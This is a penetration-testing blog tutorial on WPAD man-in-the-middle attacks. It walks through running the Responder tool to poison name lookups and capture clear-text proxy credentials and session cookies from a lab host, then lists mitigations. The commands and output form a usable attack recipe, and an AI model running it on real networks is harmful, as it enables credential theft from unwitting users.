July 03, 2013
WPAD Man in the Middle (Clear Text Passwords)
Written by
David Kennedy
This is a quick tutorial on a little trick that utilizes an exposure to grab clear text credentials. If you’re not already aware, there is potential vulnerability that exists in the way that Internet Explorer is configured to “auto detect” its proxy settings. If “Automatically detect proxy settings” is checked in the proxy configuration tab, IE will generate a name lookup request on the network, for a host named “WPAD”, on initialization.
On a corporate network, a DNS entry for “WPAD” should point to a proxy server that hosts a “wpad.dat” file, which tells Internet Explorer where to direct its Internet traffic. If that DNS query fails, the client falls back to WINS, and finally resorts to a local broadcast to try to find a host named “WPAD” on the network. On operating systems of Windows Vista and later, this request is based on a protocol named Link-local Multi-cast Name Resolution (LLMNR).
Here is where the dirty trick comes in. If we are on the same broadcast network as the client attempting to resolve this “WPAD” host, we can create a service that answers that request and claims that we are that host. Another dirty trick is to host the “wpad.dat” file on an HTTP server that requires basic authentication. Who doesn’t try re-entering their credentials when prompted on their corporate network, right?
So, the brilliant folks at SpiderLabs have provided us with an awesome utility, named Responder, that we can use to exploit the scenario described above. To install, use GIT to clone the repository.
All captured credentials are echoed to the console as well as saved to a text file in the same directory.
root@kali:/opt# git clone https://github.com/SpiderLabs/Responder.git Cloning into 'Responder'... remote: Counting objects: 82, done. remote: Compressing objects: 100% (35/35), done. remote: Total 82 (delta 46), reused 80 (delta 45) Unpacking objects: 100% (82/82), done.Run the script with the “-h” argument to enumerate the available options.
root@kali:/opt/Responder# python Responder.py -h Usage: python Responder.py -i 10.20.30.40 -b 1 -s On -r 0 Options: -h, --help show this help message and exit -i 10.20.30.40, --ip=10.20.30.40 The ip address to redirect the traffic to. (usually yours) -b 0, --basic=0 Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.This option is mandatory. -s Off, --http=Off Set this to On or Off to start/stop the HTTP server. Default value is On --ssl=Off Set this to On or Off to start/stop the HTTPS server. Default value is On -S Off, --smb=Off Set this to On or Off to start/stop the SMB server. Default value is On -q Off, --sql=Off Set this to On or Off to start/stop the SQL server. Default value is On -r 0, --wredir=0 Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off (0) -c 1122334455667788, --challenge=1122334455667788 The server challenge to set for NTLM authentication. If not set, then defaults to 1122334455667788, the most common challenge for existing Rainbow Tables -l Responder-Session.log, --logfile=Responder-Session.log Log file to use for Responder session. -f Off, --fingerprint=Off This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query. -F On, --ftp=On Set this to On or Off to start/stop the FTP server. Default value is On -L On, --ldap=On Set this to On or Off to start/stop the LDAP server. Default value is On -D On, --dns=On Set this to On or Off to start/stop the DNS server. Default value is On -w Off, --wpad=Off Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is Off --lm=0 Set this to 1 if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False (0)Now, we simply run the script with the basic authentication and WPAD modules enabled, sit back, and wait for the clear text creds to roll in.
root@kali:/opt/Responder# python Responder.py -i 192.168.81.168 -b 1 -w On NBT Name Service/LLMNR Answerer 1.0. Please send bugs/comments to: [email protected] To kill this script hit CRTL-C [+]NBT-NS & LLMNR responder started Global Parameters set: Challenge set is: 1122334455667788 WPAD Proxy Server is:ON HTTP Server is:ON HTTPS Server is:ON SMB Server is:ON SMB LM support is set to:0 SQL Server is:ON FTP Server is:ON DNS Server is:ON LDAP Server is:ON FingerPrint Module is:OFFWhen the client attempts to access the Internet, a prompt is displayed for credentials. When entered, the credentials are captured and the client is redirected to the Internet.
LLMNR poisoned answer sent to this IP: 192.168.81.139. The requested name was : wpad. LLMNR poisoned answer sent to this IP: 192.168.81.139. The requested name was : wpad. [+]WPAD file sent to: 192.168.81.139 [+]WPAD file sent to: 192.168.81.139 [+]WPAD file sent to: 192.168.81.139 LLMNR poisoned answer sent to this IP: 192.168.81.139. The requested name was : wpadwpadwpad. [+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.com/ [+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=cf041dac8a824658:U=378b2bd61a938327:FF=0:TM=1370374508:LM=1370374965:S=bGMJzuuLXRGW_FMG; NID=67=s5Du4EheeC4qgE8wCp1UpOV-qVFHLeRblrMBRtbsvSf_FJzu5HF6ukgcUx4l_g74TcqLJtS40PNxLB_qyxnCAoMw5VJ2A6pdYyZeco1cYfP35EjWDjCIpk0DdlQCkuhB [+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.com/ [+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=cf041dac8a824658:U=378b2bd61a938327:FF=0:TM=1370374508:LM=1370374965:S=bGMJzuuLXRGW_FMG; NID=67=s5Du4EheeC4qgE8wCp1UpOV-qVFHLeRblrMBRtbsvSf_FJzu5HF6ukgcUx4l_g74TcqLJtS40PNxLB_qyxnCAoMw5VJ2A6pdYyZeco1cYfP35EjWDjCIpk0DdlQCkuhB [+][Proxy]HTTP-User & Password: Spoonman:PleaseDon'tStealMyPassword!!! [+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.co.uk/ [+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=133881244d00a360:U=695158418963de2f:FF=0:TM=1370374508:LM=1370374965:S=Z-zbOdxLlJKMAi9j; NID=67=ZAlxN3yhjTrFufC58FtofKUgd1EpBDH5V5KhdNoim_yGDDTMyyhvLdhYEevm84-Wg66zeHwGdnaFMzr_og0yJgjsNTpFeKo872exiCknsH4Nd1PRbm33Aa9W8oK-WBDa [+][Proxy]HTTP-User & Password: Spoonman:PleaseDon'tStealMyPassword!!! [+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.co.uk/gen_204?atyp=i&ct=&cad=&vet=10CAYQ-Cc&ei=GK6vUc-AM7L60gX9-4DwAw&zx=1370467867536 [+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=133881244d00a360:U=695158418963de2f:FF=0:TM=1370374508:LM=1370374965:S=Z-zbOdxLlJKMAi9j; NID=67=ZAlxN3yhjTrFufC58FtofKUgd1EpBDH5V5KhdNoim_yGDDTMyyhvLdhYEevm84-Wg66zeHwGdnaFMzr_og0yJgjsNTpFeKo872exiCknsH4Nd1PRbm33Aa9W8oK-WBDa [+][Proxy]HTTP-User & Password: Spoonman:PleaseDon'tStealMyPassword!!! [+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.co.uk/gen_204?v=3&s=webhp&action=&e=17259,4000116,4001351,4001948,4002855,4003714,4004320,4004334,4004788,4004844,4004897,4004943,4004949,4004953,4004972,4005031,4005614,4005819,4005864,4005875,4005986,4006191,4006339,4006347,4006349,4006425,4006442,4006466,4006524,4006541,4006578,4006727,4007007,4007009,4007020,4007055,4007060,4007073,4007076,4007080,4007117,4007118,4007131,4007158,4007232,4007296,4007321,4007328,4007335,4007445,4007521,4007533&ei=GK6vUc-AM7L60gX9-4DwAw&imc=3&imn=3&imp=3&dM=10&atyp=csi&adh=&rt=xjsls.176,prt.178,ol.196,iml.182,xjses.363,xjsee.414,xjs.460,wsrt.23930,cst.0,dnst.0,rqst.236,rspt.143 [+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=133881244d00a360:U=695158418963de2f:FF=0:TM=1370374508:LM=1370374965:S=Z-zbOdxLlJKMAi9j; NID=67=ZAlxN3yhjTrFufC58FtofKUgd1EpBDH5V5KhdNoim_yGDDTMyyhvLdhYEevm84-Wg66zeHwGdnaFMzr_og0yJgjsNTpFeKo872exiCknsH4Nd1PRbm33Aa9W8oK-WBDa [+][Proxy]HTTP-User & Password: Spoonman:PleaseDon'tStealMyPassword!!! root@kali:/opt/Responder# cat HTTP-Proxy-Clear-Text-Password-192.168.81.139.txt Spoonman:PleaseDon'tStealMyPassword!!!Now, how do we protect our corporate networks from this attack? The simplest solution is to create a DNS entry for “WPAD” that points to the corporate proxy server. Even if the server doesn’t actually host a “wpad.dat” file, an attacker won’t be able to exploit the client resolution process (unless, of course, the DNS server is compromised). Another solution is to disable “Autodetect proxy settings” on all Internet Explorer clients, through Group Policy or any other configuration delivery method. Now go, and be the Middle Man. This blog post was written by Larry Spohn - Senior Security Consultant at TrustedSec.